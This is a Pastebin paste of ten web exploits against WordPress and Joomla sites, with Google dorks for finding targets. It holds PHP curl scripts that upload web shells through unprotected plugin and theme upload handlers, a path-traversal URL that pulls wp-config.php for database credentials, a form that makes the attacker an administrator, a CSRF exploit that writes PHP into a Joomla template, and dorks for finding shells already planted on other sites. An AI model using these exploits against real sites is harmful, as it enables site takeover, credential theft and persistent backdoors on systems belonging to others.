ToKeiChun

10 Latest Exploit [from https://pastebin.com/u/AnonGhots]

Feb 10th, 2020
427
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. YH=YH=YH=ANON=Yh=Yh=yH
  2. #YassineElHilali
  3.  
  4. #1.Exploit Title:WordPress Font Uploader Shell Upload
  5. Google Dork : inurl:/wp-content/plugins/font-uploader/
  6. code===>
  7. <?php
  8.  
  9. $uploadfile="yourshellname.php.ttf";
  10. $ch =
  11. curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
  12. curl_setopt($ch, CURLOPT_POST, true);
  13. curl_setopt($ch, CURLOPT_POSTFIELDS,
  14. array('font'=>"@$uploadfile",
  15. 'Submit'=>'submit'));
  16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  17. $postResult = curl_exec($ch);
  18. curl_close($ch);
  19. print "$postResult";
  20.  
  21. ?>
  22. ========================================================
  23. #2.Exploit Title:Wordpress plugin Arbitary File Upload All Version
  24. Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
  25. ==>after going to your desire site u will find a file/folder [uploadify] u need to click there
  26. sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
  27. code==>
  28. <?php
  29. $uploadfile="yourshell.php";
  30.  
  31. $ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
  32. curl_setopt($ch, CURLOPT_POST, true);
  33. curl_setopt($ch, CURLOPT_POSTFIELDS,
  34. array('Filedata'=>"@$uploadfile",
  35. 'folder'=>'/'));
  36. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  37. $postResult = curl_exec($ch);
  38. curl_close($ch);
  39. print "$postResult";
  40.  
  41. ?>
  42. ==========================================================
  43. #3.Exploit Title:Wordpress Atom Themes Arbitary File Upload
  44. Google Dork : inurl:"/wp-content/themes/atom/"
  45. code==>
  46. <?php
  47. $uploadfile="yourshell.php";
  48.  
  49. $ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
  50. curl_setopt($ch, CURLOPT_POST, true);
  51. curl_setopt($ch, CURLOPT_POSTFIELDS,
  52. array('Filedata'=>"@$uploadfile",
  53. 'folder'=>'/'));
  54. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  55. $postResult = curl_exec($ch);
  56. curl_close($ch);
  57. print "$postResult";
  58.  
  59. ?>
  60.  
  61. Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php
  62. =============================================================
  63. #4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability
  64. Google Dork:inurl:"/wp-content/themes/soulmedic/"
  65. http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  66. ===>u will find database password/name of that server
  67. ================================================================
  68. #5.Exploit Title:PHP File Upload Vulnerability
  69. Google Dork:inurl:images/jupload.php;guest100;guest100
  70. http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100]
  71. http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
  72. if u find uploading option then u can upload your shell
  73. shell access==>http://www.yourtarget.com/images/shell.php
  74. ==================================================================
  75. #6.Exploit Title:Hades+ Framework Add Administrator
  76. Google multiple Dork: inurl:/wp-content/themes/appius/
  77. inurl:/wp-content/themes/Consultant/
  78. inurl:/wp-content/themes/appius1/
  79. inurl:/wp-content/themes/archin/
  80. inurl:/wp-content/themes/averin/
  81. inurl:/wp-content/themes/dagda/
  82. inurl:/wp-content/themes/echea/
  83. inurl:/wp-content/themes/felici/
  84. inurl:/wp-content/themes/kmp/
  85. inurl:/wp-content/themes/kmp2/
  86. inurl:/wp-content/themes/liberal/
  87. inurl:/wp-content/themes/liberal-media-bias/
  88. inurl:/wp-content/themes/linguini/
  89. inurl:/wp-content/themes/livewire/
  90. inurl:/wp-content/themes/majestics/
  91. inurl:/wp-content/themes/mathis/
  92. inurl:/wp-content/themes/mazine/
  93. inurl:/wp-content/themes/Orchestra/
  94. inurl:/wp-content/themes/shopsum/
  95. inurl:/wp-content/themes/shotzz/
  96. inurl:/wp-content/themes/test/
  97. inurl:/wp-content/themes/Viteeo/
  98. inurl:/wp-content/themes/vithy/
  99. inurl:/wp-content/themes/yvora/
  100. inurl:/wp-content/themes/sodales/
  101. Exploit:
  102. <form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
  103. <input name="values[0][name]" value="users_can_register">
  104. <input name="values[0][value]" value="1">
  105. <input name="values[1][name]" value="admin_email">
  106. <input name="values[1][value]" value="{%YOUR_EMAIL}">
  107. <input name="values[2][name]" value="default_role">
  108. <input name="values[2][value]" value="administrator">
  109. <input name="action" value="save">
  110. <input type="submit" value="Submit">
  111. </form>
  112. Process==>
  113. 1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
  114. sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
  115. 2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form].
  116. 3. choose your username & email address and register.
  117. 4. go to your email, you will find your password.
  118. 5. then login & and upload your shell
  119. ===============================================================
  120. #7.Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
  121. Google Dork: inurl:/wp-content/themes/dandelion/
  122. Code==>
  123. <?php
  124. $uploadfile="yourshell.php";
  125. $ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
  126. curl_setopt($ch, CURLOPT_POST, true);
  127. curl_setopt($ch, CURLOPT_POSTFIELDS,
  128. array('Filedata'=>"@$uploadfile"));
  129. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  130. $postResult = curl_exec($ch);
  131. curl_close($ch);
  132. print "$postResult";
  133. ?>
  134. shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php
  135. =====================================================================
  136. #8.Exploit Title: Wordpress satoshi Themes Arbitry File Upload
  137. Google Dork: inurl:/wp-content/satoshi/dandelion/
  138. Code==>
  139. <?php
  140. $uploadfile="yourshell.php";
  141. $ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
  142. curl_setopt($ch, CURLOPT_POST, true);
  143. curl_setopt($ch, CURLOPT_POSTFIELDS,
  144. array('Filedata'=>"@$uploadfile"));
  145. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  146. $postResult = curl_exec($ch);
  147. curl_close($ch);
  148. print "$postResult";
  149. ?>
  150. ========================================================================
  151. #8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
  152. <?php
  153. /**
  154. * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
  155. * 3 October 2010
  156. * jdc
  157. *
  158. * How it works - admin template form has no nonce
  159. * How to exploit - get a logged in admin to click the wrong link ;)
  160. * Patched in 2.1.7
  161. */
  162. // change these
  163. $target = 'http://localhost/joomla';
  164. $exploit = '<?php echo phpinfo(); ?>';
  165. /* page - any one of:
  166. page_addCategory
  167. page_addListing
  168. page_advSearchRedirect
  169. page_advSearchResults
  170. page_advSearch
  171. page_claim
  172. page_confirmDelete
  173. page_contactOwner
  174. page_errorListing
  175. page_error
  176. page_gallery
  177. page_image
  178. page_index
  179. page_listAlpha
  180. page_listing
  181. page_listListings
  182. page_ownerListing
  183. page_print
  184. page_recommend
  185. page_replyReview
  186. page_reportReview
  187. page_report
  188. page_searchByResults
  189. page_searchResults
  190. page_subCatIndex
  191. page_usersFavourites
  192. page_usersReview
  193. page_writeReview
  194. sub_alphaIndex
  195. sub_images
  196. sub_listingDetails
  197. sub_listings
  198. sub_listingSummary
  199. sub_map
  200. sub_reviews
  201. sub_subCats
  202. */
  203. $page = 'page_print';
  204. // don't change these
  205. $path = '/administrator/index.php';
  206. $data = array(
  207. 'pagecontent' => $exploit,
  208. 'template' => 'm2',
  209. 'option' => 'com_mtree',
  210. 'task' => 'save_templatepage',
  211. 'page' => $page
  212. );
  213. ?>
  214. <html>
  215. <body>
  216. <?php if (@$_GET['iframe']) : ?>
  217. <form id="csrf" action="<?php echo $target.$path; ?>" method="post">
  218. <?php foreach ($data as $k => $v) : ?>
  219. <input type="text" value="<?php echo htmlspecialchars($v); ?>"
  220. name="<?php echo $k; ?>" />
  221. <?php endforeach; ?>
  222. <script type="text/javascript">
  223. document.forms[0].submit();
  224. </script>
  225. </form>
  226. <?php else : ?>
  227. <h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
  228. <p>If you were logged in as admin, you just got owned!</p>
  229. <div style="display:none">
  230. <iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
  231. </div>
  232. <?php endif; ?>
  233. </body>
  234. </html>
  235. #9.Exploit Title:wordpress potential themes vuln upload
  236. 1.dork: inurl:/wp-content/themes/nuance/
  237. exploit: /functions/jwpanel/scripts/valums_uploader/php.php
  238.  
  239. 2. dork: inurl:/wp-content/themes/lightspeed/
  240. exploit: /framework/_scripts/valums_uploader/php.php
  241.  
  242. 3. dork: inurl:/wp-content/themes/saico/
  243. exploit: /framework/_scripts/valums_uploader/php.php
  244.  
  245. 4. dork: inurl:/wp-content/themes/eptonic/
  246. exploit: /functions/jwpanel/scripts/valums_uploader/php.php
  247.  
  248. 5. dork: inurl:/wp-content/themes/skinizer/
  249. exploit: /framework/_scripts/valums_uploader/php.php
  250.  
  251. 6. dork: inurl:/wp-content/themes/area53/
  252. exploit: /framework/_scripts/valums_uploader/php.php
  253.  
  254. 7. dork: inurl:/wp-content/themes/blinc/
  255. exploit:/framework/_scripts/valums_uploader/php.php
  256.  
  257. csrf from html:
  258.  
  259. <form enctype="multipart/form-data"
  260. action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
  261. <input type="jpg" name="url" value="./" /><br />
  262. Please choose a file: <input name="qqfile" type="file" /><br />
  263. <input type="submit" value="upload" />
  264. </form>
  265. it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
  266. shell link==>
  267. http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
  268. http://www.yourtarget.com/wp-content/uploads/shell.php
  269. #10.Exploit Title:For Noob[Dorking shell]
  270. b374k m1n1
  271. Quote:
  272. google dork :
  273. intitle:b374k m1n1 inurl:wp-content
  274. intitle:"index of /" "b374k.php"
  275.  
  276.  
  277. Dorking shell wso
  278. Quote:
  279. google dork :
  280. intitle:"Index of /uploads" "wso.php"
  281. intitle:"index of /" "wso.php"
  282.  
  283.  
  284. Dorking Shell Madspot
  285. Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini.
  286. Quote:
  287. google dork :
  288. intitle:Madspot Security site:com
  289.  
  290.  
  291. Dorking Shell 1n73ct10n
  292. Quote:
  293. google dork :
  294. intitle:1n73ct10n inurl:wp-content
  295. intitle:"index of /" "1n73ct10n.php"]
  296. ###########################################################################################
  297. and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload
  298. But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development
  299. website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you]
Add Comment
Please, Sign In to add comment